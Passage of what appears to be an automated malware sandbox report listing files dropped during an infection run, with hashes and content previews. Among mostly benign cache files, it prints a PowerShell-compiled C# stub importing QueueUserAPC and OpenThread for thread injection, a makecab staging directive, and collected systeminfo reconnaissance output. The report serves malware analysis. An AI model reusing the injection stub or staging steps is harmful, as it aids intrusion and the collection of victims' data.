                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):2348
                                                                                                                                        Entropy (8bit):5.976164493168849
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:9CiwVWVtTlYlr4m8NGUhnhVlD1Nk01FyMYkL51GcbgHbVoOO:UiwAVZ2rIwMhVln1IMJWcYoOO
                                                                                                                                        MD5:3C31070D8B5C90E2BF19147B1128894C
                                                                                                                                        SHA1:415553F00F6FEB865B46334581504DCD32669800
                                                                                                                                        SHA-256:E662196FF655BAA084CF7818FB48E8B6E1EB56C7F7EFC48B38347E672AA36123
                                                                                                                                        SHA-512:D97D84B05CB753665987362D3607A6060275A079AEE0813A94FCD310BC66229ABCEC20F95556CA87E784C49D255AD49A92A687104584582D3DE9DEC26F7B2FC8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: KknAbvh+h12z+ORS2V6YKLpOzzNt8tyQukl8ARdOo1lbrKTxKyVMFMK85NPB9aTUoQc3fKjzS0AIBHUgZK6OFQq9jxe8ziDYvosVyA2YrRPEKg7C7zH9vlNqXvjiJCC4jcv7ToEwHyhbEG7+f6/oTOrVmZZncEZ7W6KpZW53szheOJs0LrDg+ZYsjm1ldoR3+6i/a7MEPx9jBr+56o16IhXEHLkqjJqVsqvgj/pwLan3wPjXx3+ObwRpvqMMxoMXZbDm8KHAu2Z/PKFLEVQuoNQ+bShgidyAWLeQqJq7hbLMUxr2nkkKnIuzjtmvpU1MJqYL4+n9tg86BrjX9ySVlQ1GlD3ZnsVKeF4sJ0bEKaYYz2dbSyfcYGVrmeDT7gnh4i+fWcIuWSJhbSUag+wOIh5XBCkzbtXobIkCPl6BeixFlxmj3mk7OO35LK8brR/y7752TT1TgCWQAZ9Du8KaUi1j4nk4g3slf7/ZnXdt99kYpm3WfYt5zbgh0kxrk8XLmmofMk3NEBc163kqbOL9/V8qZQTvPzKwk7nLLyDVrE0MLOuooC/xspB/1mfeQr2G0sBP0ENChOvIudt6K4gfxynhjtJcGeVwqF09zz6gE9WsKIgDMZB5eWsuxMHX7LDKUC1F6haebg2Gq88m8Haod9B8dD45VYMXBqhZ40jYee27eCgk4y/8RxF8A4HTmd8HnTRxq+E9xX+8crfsecBao9bRemLT2GjPkmChcWVrQ1KWmsDJztXACbyS2nKq5L0qPKJXPP92lmkGHE75i+my9ajANL13/W2ZKszKYJesyg6+yt2aZ2bbHF3p1mSXzwenjwY0Ctv8DBlmbLd7xomsLKHIlkJv7iqZwnHKsFiHbtd44yRINnef/ErhvomlHg6PWoplijcz7raPt6b3KUNLAfoxEfkqvFfHYSp6Yg9KuI+BDIA5B9PxxUixfaySTVahMCNAcWbaZFiyh9Ld3WG37BYn5rsCDyEsl+NmKAjX
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\httpErrorPagesScripts[1]
                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):12105
                                                                                                                                        Entropy (8bit):5.451485481468043
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                        MD5:9234071287E637F85D721463C488704C
                                                                                                                                        SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                        SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                        SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\NewErrorPageTemplate[1]
                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1612
                                                                                                                                        Entropy (8bit):4.869554560514657
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                                                                                                        MD5:DFEABDE84792228093A5A270352395B6
                                                                                                                                        SHA1:E41258C9576721025926326F76063C2305586F76
                                                                                                                                        SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                                                                                                        SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\favicon[1].ico
                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                        File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):5430
                                                                                                                                        Entropy (8bit):4.0126861171462025
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:n0aWBDm5zDlvV2rkG4zuAZMXJFG62q7mQ:nCBy5zZ0IG46AaXJFG6v7m
                                                                                                                                        MD5:F74755B4757448D71FDCB4650A701816
                                                                                                                                        SHA1:0BCBE73D6A198F6E5EBAFA035B734A12809CEFA6
                                                                                                                                        SHA-256:E78286D0F5DFA2C85615D11845D1B29B0BFEC227BC077E74CB1FF98CE8DF4C5A
                                                                                                                                        SHA-512:E0FB5F740D67366106E80CBF22F1DA3CF1D236FE11F469B665236EC8F7C08DEA86C21EC8F8E66FC61493D6A8F4785292CE911D38982DBFA7F5F51DADEBCC8725
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ............ .h...&... .... .........(....... ..... .....@.....................s...s...s...sw..r.......s...s...s...s.......s...s..s...s...s...s...r...s{..s...s#..s...s..r..s..s...s[..s...s...s..s...s...s...s}..s...sW..r..s...sm..sK..sC..sw..s..s...s%..s!..s..s...s...s...sU..s.sY..s...s..s..r#......s...s...s..s...r%..s[..s...s...s..s]..s...r.sS..s...sq..........s...s...s...s...s.......su..s...s.......s...s..s.sA..............s%..s..s#......r...r...s]..........s...s..sk..s...s...........s...s...s]......s...r..s7..........s...s..r...r...s...r...........s...s.......s...s..s7..........s...s..si..s?..s7..s...........s...s.......s...s...rW..........s...s..s...s...s...s...........s...s[..........ss..s...s.......s...s..sm..sI..s;..s.......s!..s..s#......s...s...s..sQ......s...s..s...r...sm..s...r...s...r...s...s...r...s...sQ..s..rK..s...sg..s'..........s...s...s..s...s'..s_..s...s...s...rQ..s..s...sK..r/..s3..sa..s...s...s!..s#..s..s...s...s...s...s...s...sy..
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\t[1].htm
                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):231524
                                                                                                                                        Entropy (8bit):5.999872918499001
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:fPD4PuEqzgvhLsxeSMeeVgTnDJ1OA8Bx5XoJrdo+wYihuEv3+bqznotiDtKjOdLS:DQIzgJuePMD3h8BwJrdJcpv+uDz8TzJ
                                                                                                                                        MD5:80AF159AABA2279B167081E6E81E6DE6
                                                                                                                                        SHA1:91C166F9EE0803CAC86A69C6F776B93CB7B989B4
                                                                                                                                        SHA-256:A46183E81E4CFCE0BEBF166610E070BE25606F4DB9217C5F03E667E19620D0F0
                                                                                                                                        SHA-512:EC45C55D467F1D91F6643F95DBFBBA42E58F9BDC96ED097093B2931D6E5D81D0E5F0980BADE601E190AF6A4C0882B38117AA245F015D1ED0E7876714A9947833
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: hHCPckWnxvLhL40M3wBoZj6zwgZky/F7TGiUCLqmwfCnS7PMDpsPg/VmZxi1YnFNx9m95Sa72qnl5mAhaZwFjz7winfHaVIHBErxRyr8P2MUEEXTrpqskDi5mtfF1Lb7ABpc8RYMYDpu8KCe9iKrLYmn5RuvJqBvkSwDZAgjSLYylFeGId0GGvt0sXsMwrfHsYUmfJrXMe6RU9GBIf79kfCXcpiDAjwEEz8mWRRcJuO+anXSwYXsihNfwtraj2jPeif6XPmxtEzq3004Pn8DMKWIhQGFwIhvljljCfjEP5XMyiAgq8PuwPSfpwk1szUMNJ3++H/mEBr4YPrGAM4T9+cPuwZoJY19GNpAIvq4VmFhm9BklEKiSNSiRODeJ+rW7rTKcJPe5Wqc83KTut714INi4PLDyqb0uCRlnAm88Mzsy2AU8wq8+xPNpP4PzCi5Uc08OxWdXcBvliEmYl6BivS1KjidzSARLWa7aWgP7Lf+ysAbzkrAw0BlLLsSOqZ7WVN8LX9E7sgUrr/CieSnZXIjPrIAYSI7oqYxMMUHB0w6B8TIKKJCeamZbidQbdQLj85i4CpLfYS5sqm9S8CGyulMj1f1ZSk6ka5F48Kp7D7DqpRGRxk6TGCcEDrzx3zim7H2Zn0oGHGOb3vrH1mEtnsgkcGUrownJUemkHD1AqbIfSmpFPJHPVcrYLIXSH+FebIrPdh/r68Uq4EzukM4JOkgJN5vIPUFDIWV31+s9u+FAnxlZjLkbCYlvZFPeAEAsdu0YuxYwEmKGkb7c2aXyccTXxMZ8wx/wzxqTch/xl/XZ+iD+b6zo22qGp23z3XXrG14vjXfudUk3LEIemajk7MjINxoThRv+Pe5tZmY+GST8Nkuas/KO/IwjgoTQ60EK72tSgJVGZodIx0C97klGzYVQQfYlchNdaVj6DotQW+TqTPtFYj3v+7CDDXRk1YVQ231FGOze5XC7mdPBORKBZe33yTqkQOFIdaMd5Mu
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie
                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):91
                                                                                                                                        Entropy (8bit):3.964980110923723
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:ApEeKm8RKQB2LI/cAtAFqyLAIRlKFvBFGmWLn:ApEVNB2LI/xyFqyLbgzGdn
                                                                                                                                        MD5:99BDE3452748E34D6C50275110A6A8D4
                                                                                                                                        SHA1:E79CB2A8DB7D8490523529D3861F95BA73A20C23
                                                                                                                                        SHA-256:D07311ACF641866E7E84823D2962F593BB655792301DC61AD6F0C6869D9C5937
                                                                                                                                        SHA-512:19FD529C6FE60BBBE3710FED93F14D723A13AD427431F855ED84F5E5E496B9F3EB8A6E8C31D740239EB225753D52A4F464B489FDBDEFF4477480026263D0F691
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: Cookies are no longer stored in files. Please use Internet*Cookie* APIs to access cookies.
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):11606
                                                                                                                                        Entropy (8bit):4.8910535897909355
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
                                                                                                                                        MD5:7A57D8959BFD0B97B364F902ACD60F90
                                                                                                                                        SHA1:7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
                                                                                                                                        SHA-256:47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
                                                                                                                                        SHA-512:83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1192
                                                                                                                                        Entropy (8bit):5.325275554903011
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:3aEPpQrLAo4KAxCoOu42qs5qRPje9t4CvKaBPnKdirh:qEPerB4BOu/q8qRLe9t4CvpBfuit
                                                                                                                                        MD5:5629AA2E2ED9FB76D3139103D36B7023
                                                                                                                                        SHA1:204350589138FDA6E9442A0DE7188F91FB32F98C
                                                                                                                                        SHA-256:2E3D93BF353C4E8A533BE3289D4BF4AEFC4308F52766C82791ED199A318C9E01
                                                                                                                                        SHA-512:176C4E9BE3664BDE20E0308BD669371B1850FEBD195A76B0D35C1E9BE7B4A09C4B5C872FE0701960375FF5DD60D90EAB2E7927276601742EAF16E64887B3768A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.Automation4...............T..'Z..N..Nvj.G.........System.Data.4................Zg5..:O..g..q..........System.Xml..<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServicesL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                        C:\Users\user\AppData\Local\Temp\550B.bin
                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):153
                                                                                                                                        Entropy (8bit):4.951311540279882
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:tFoYXBsJaQGQbt+kiE2J5xAIkLW0HbRQ9mqL5O1t+kiE2J5xAIkzR:tFdXBWwkn23fCvVQ9mqWwkn23fkl
                                                                                                                                        MD5:83491A461E61C40F7F52FD9D85FD69E6
                                                                                                                                        SHA1:17A97FFDFC95F80CAF963AC3F414C1199490D755
                                                                                                                                        SHA-256:76E12C0E0800598F615B203DEDD3B63808EE38B6356ACA8B34B57F1D2B6D7662
                                                                                                                                        SHA-512:915C337CAABCC03FB0A019F0143168B1B0B235C01515444D2CE34731F29A92AA0ABE3D0102E03EF3427B205333F27AF94AC32620B13C5BFAD96F0B6EDC1D40B2
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .set MaxDiskSize=0...set DiskDirectory1="C:\Users\user\AppData\Local\Temp"...set CabinetName1="5DAF.bin".."C:\Users\user\AppData\Local\Temp\D245.bin"..
                                                                                                                                        C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.0.cs
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):412
                                                                                                                                        Entropy (8bit):5.000183840500447
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:V/DsYLDS81zuJ/Q7NkmMRSR7a1Et4atQVSRa+rVSSRnA/fHfVNr+pdKy:V/DTLDfu9Enx4atF9rV5nA/3na+y
                                                                                                                                        MD5:9374CDED96EE09456F8770891F7C7BB0
                                                                                                                                        SHA1:94A8FA474651BF57184B3D4303BE784BBEE0D3A1
                                                                                                                                        SHA-256:2D22A87F2B278E4088D64A7B51BC202FB4FCC09335DFD0E9B1E3FA02C9708916
                                                                                                                                        SHA-512:4533522340293E905A62452A17476440ACAD2B5A34C38D690F5A24B6F14E4F4A8F7DC82EE2D61955554425615588104C1F84D76C6443A8A4252ECF961ABECA6B
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class vqaxvunjiuh. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr tpcnqkjvtbr,IntPtr tqisro,IntPtr mibgqo);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint nevxq,uint gshkn,IntPtr hrrrtklhvx);.. }..}.
                                                                                                                                        C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):369
                                                                                                                                        Entropy (8bit):5.281933854014794
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fthvUm3+zxs7+AEszIwkn23fthvUmj:p37Lvkmb6KRf1hpuWZEif1hpj
                                                                                                                                        MD5:FC6723CF317254AE298E117A08FFA5E5
                                                                                                                                        SHA1:7EB7404BC5CC892D18DB2519CBAD2482762929E3
                                                                                                                                        SHA-256:B37010456CF1F54DB42C318B8F79E49ED76DA13E2D24072A4E6A2132E5F5E5B9
                                                                                                                                        SHA-512:48B24BDDEB8548281CF6325A08955C219B33B13191425EB1A49A9582671E4B3ACC5ED47FAAA36D8F86E0BBAA683AAA2F129B32231D34644B25BEDE8D2F5B358E
                                                                                                                                        Malicious:true
                                                                                                                                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.0.cs"
                                                                                                                                        C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.dll
                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):3584
                                                                                                                                        Entropy (8bit):2.6403997534990324
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:etGSE8+mDR85B8Ftd0g76zk4lANEtkZfeBykDZ0hEdI+ycuZhNYakSUPNnq:6OmS5B8GgezRAdJeIaZ6Ed1ulYa30q
                                                                                                                                        MD5:F626114212FE9424E3E9DE33997F67E1
                                                                                                                                        SHA1:7C2377A566F07020E2A58E9679926914B7B67FD8
                                                                                                                                        SHA-256:9485576AC954FEEE2A555578E3ED38F323DE8A2288BE7BBD4B130CCF6925A499
                                                                                                                                        SHA-512:7445F9842C94B5762A9DFD0469EEF99A911A4304B3F98E5C7A746EC196266300A5389F5DD2CF158BD4E38DC654E4425F0529B2ABE04EEDB8460691115905E4A1
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.._...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................7.0...............&.......................#.............. >............ K............ ^.....P ......i.........o.....{...........................i. ...i...!.i.%...i.......*.....3.9.....>.......K.......^.......................................'........<Module>.5ycfw01g.dll.vqaxvunjiuh.W32.mscor
                                                                                                                                        C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.out
                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):412
                                                                                                                                        Entropy (8bit):4.871364761010112
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                        MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                        SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                        SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                        SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                        C:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP
                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                        File Type:MSVC .res
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):652
                                                                                                                                        Entropy (8bit):3.109653308572969
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryXGak7YnqqcXPN5Dlq5J:+RI+ycuZhNYakSUPNnqX
                                                                                                                                        MD5:D567233501676EAAE70E1A3490E7EDEA
                                                                                                                                        SHA1:F90930FA7E097EE48A041C435840E4DA28459C33
                                                                                                                                        SHA-256:5F078A0AB519F078AC32FA4BCA8ACDD0DB1AE9034A59D0EC347B27D1459AE2E1
                                                                                                                                        SHA-512:31B002E7AC11078156C8FF9C436525A94CCAA7440AB92754FE6ABD759988B71D0EA849D3A25AAD6E6BC6A5B25F5B0547F3520199C80772F888E477CDE50E68DD
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.y.c.f.w.0.1.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.y.c.f.w.0.1.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                        C:\Users\user\AppData\Local\Temp\D245.bin
                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):51540
                                                                                                                                        Entropy (8bit):3.997569565449623
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:4Io54/gkqkhvvr2Cr8LKQ1XaWMtyPDuH++HXFLj13Mo4FMiItNRM5Ql4/uypnF2l:4I8B9QJ
                                                                                                                                        MD5:64D79BA55D95E5A6D104240A445757AF
                                                                                                                                        SHA1:8BB4CEA288003E02A8B4E6F04AF994DFBB001C16
                                                                                                                                        SHA-256:12589FBC65B37724BF61D59DDD353EB349ECC7509BD83BF838FB30A4C3D4BBE0
                                                                                                                                        SHA-512:D013963669CA8F7940673638978511C32B0840D80E0A4616601444FC62FE0B3F8E800C4E41A1659165ADDBAEC14ADCAF453BD3B51A22588421E603F7A4C529BB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ..Host Name: 610930..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.17134 N/A Build 17134..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: pratesh..Registered Organization: ..Product ID: 00330-71388-77104-AAOEM..Original Install Date: 2/16/2019, 11:04:51 PM..System Boot Time: 11/26/2020, 12:17:49 AM..System Manufacturer: aY 1E9U3nfNDMWp..System Model: KK8ztfXa..System Type: x64-based PC..Processor(s): 1 Processor(s) Installed... [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz..BIOS Version: LHV35 3W5CW, 6/19/2019..Windows Directory: C:\Windows..System Directory: C:\Windows\system32..Boot Device: \Device\HarddiskVolume2..System Locale:
                                                                                                                                        C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):89
                                                                                                                                        Entropy (8bit):4.350647094482033
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:oVXVPE4k98JOGXnFPE4un:o9yx9qCz
                                                                                                                                        MD5:6E2286D28C17A10B19E99C90C76BE26F
                                                                                                                                        SHA1:93FFCDDE9FB5D0CC5F889BE642E1F81F64D9EC71
                                                                                                                                        SHA-256:5EF9E81B04DC63A4FC36CB6A5A59375E0B50CFCF900963BE893F4003204241BC
                                                                                                                                        SHA-512:C2F8FA87FE0017D6A6D6363ED42C797C1AFE80E9BEF23FAEDF95EABD70716F0596ECDB4BE83A4EBC9F9E2975137FBA2E49A0DA9B1257C8D88AADD595C76A6936
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: [2020/11/26 01:31:07.238] Latest deploy version: ..[2020/11/26 01:31:07.238] 11.211.2 ..
                                                                                                                                        C:\Users\user\AppData\Local\Temp\RES4E97.tmp
                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):2184
                                                                                                                                        Entropy (8bit):2.703409301509041
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:bZf1hc5daDfHWhKdNNI+ycuZhNYakSUPNnq9qpWe9Ep:bBzcwsKd31ulYa30q9p
